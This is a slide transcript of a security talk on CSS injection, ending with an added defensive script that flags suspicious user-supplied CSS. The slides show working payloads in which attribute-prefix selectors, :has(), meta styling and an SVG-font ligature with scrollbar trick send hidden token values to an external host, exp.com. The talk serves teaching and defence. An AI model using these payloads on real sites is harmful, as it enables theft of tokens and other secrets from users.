Attacking web without JS - CSS injection

Huli
September 22, 2022

When it comes to front-end web security, XSS is the first thing that comes to mind. But even without JavaScript, an attacker can still use other attack vectors such as HTML injection and CSS injection. This talk is an introduction to CSS injection.


Transcript

  1. About Huli

     • Security Researcher at Cymetrics / OneInfinity
     • CTF player at Water Paddler
     • https://blog.huli.tw/
  2. Steal input value

     <form>
       <input type=hidden name=token value=abc123>
       <input name="action" value="update">
       <input type="submit">
     </form>

     input[value^="a"] {
       background: url("//exp.com?a");
     }
  3. Steal input value

     <form>
       <input type=hidden name=token value=abc123>
       <input name="action" value="update">
       <input type="submit">
     </form>

     input[value^="a"] + input {
       background: url("//exp.com?a");
     }
  4. has: to the rescue

     <form>
       <input name="action" value="update">
       <input type="submit">
       <input type=hidden name=token value=abc123>
     </form>

     form:has(input[value^="a"]) {
       background: url("//exp.com?a");
     }
  5. Steal meta content

     <head>
       <meta name=token content=abc123>
     </head>

     meta {
       display: block;
     }
     meta[content^="a"] {
       background: url(//exp.com?a);
     }
  6. Steal meta content

     <head>
       <meta name=token content=abc123>
     </head>

     meta {
       display: block;
     }
     meta[content^="a"] {
       background: url(//exp.com?a);
     }
  7. Steal meta content

     <head>
       <meta name=token content=abc123>
     </head>

     meta, head {
       display: block;
     }
     meta[content^="a"] {
       background: url(//exp.com?a);
     }
  8. ligature

     <svg>
       <defs>
         <font horiz-adv-x="0">
           <font-face font-family="leak" units-per-em="1000" />
           <glyph unicode="&quot;a" horiz-adv-x="10000" d="M1 0z"/>
         </font>
       </defs>
     </svg>
  9. ligature + scroll bar

     script {
       width: 300px;
       display: block;
       font-family: "leak";
       white-space: nowrap;
       overflow-x: auto;
     }
     script::-webkit-scrollbar {
       background: blue;
     }
     script::-webkit-scrollbar:horizontal {
       background: url(https://exp.com?a);
     }
  10. Mitigation

     • Sanitization
     • Content Security Policy
       • style-src
       • font-src
     • Check origin/referer header
     • Same-site cookie
  11. Q&A
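
As an added example (not code from the talk), here is a small auditor for user-supplied CSS that supports the sanitization point on the Mitigation slide: it flags rules that pair a partial attribute-value selector or a scrollbar pseudo-element with a `url()` pointing outside an allow-list. `SELF_ORIGIN`, the allow-listed host and the sample CSS are constructed assumptions; the flagged selectors are the ones shown in the slides.

```javascript
// Added example. SELF_ORIGIN and the sample CSS are constructed placeholders.
const SELF_ORIGIN = "https://app.example";
const PARTIAL_ATTR = /\[\s*([\w-]+)\s*[\^$*]=/g;   // [attr^=], [attr$=], [attr*=]
const URL_FN = /url\(\s*(["']?)(.*?)\1\s*\)/gi;     // url(x), url("x"), url('x')
const RULE = /([^{}]+)\{([^{}]*)\}/g;               // selector { declarations }

// Hosts referenced by url() that are neither same-origin nor allow-listed.
function externalHosts(declarations, allowedHosts) {
  const selfHost = new URL(SELF_ORIGIN).host;
  const hosts = [];
  for (const m of declarations.matchAll(URL_FN)) {
    let target;
    try { target = new URL(m[2], SELF_ORIGIN); } catch (e) { continue; }
    if (target.protocol === "data:") continue;      // inline data, no request leaves
    if (target.host !== selfHost && !allowedHosts.includes(target.host)) {
      hosts.push(target.host);
    }
  }
  return hosts;
}

// Flag rules whose selector tests part of an attribute value, or styles a
// scrollbar pseudo-element, while the declarations fetch from an external host.
function auditCss(cssText, allowedHosts = []) {
  const findings = [];
  for (const [, rawSelector, declarations] of cssText.matchAll(RULE)) {
    const selector = rawSelector.trim();
    const reasons = [...selector.matchAll(PARTIAL_ATTR)].map(m => "attr:" + m[1]);
    if (/::-webkit-scrollbar/i.test(selector)) reasons.push("scrollbar");
    const hosts = externalHosts(declarations, allowedHosts);
    if (reasons.length > 0 && hosts.length > 0) {
      findings.push({ selector, reasons, hosts });
    }
  }
  return findings;
}

// Constructed sample: selectors from the slides plus two benign rules.
const SAMPLE_CSS = `
  input[value^="a"] { background: url("//exp.com?a"); }
  form:has(input[value^="a"]) { background: url("//exp.com?a"); }
  meta[content^="a"] { background: url(//exp.com?a); }
  script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }
  a[href^="http"] { background: url(/img/external.png); }
  .hero { background: url(https://cdn.example/hero.png); }
`;

for (const f of auditCss(SAMPLE_CSS, ["cdn.example"])) {
  console.log(f.reasons.join(","), "->", f.hosts.join(","), "|", f.selector);
}
```

A check like this complements a restrictive `style-src` / `font-src` policy and does not replace it: it only sees the CSS text it is handed.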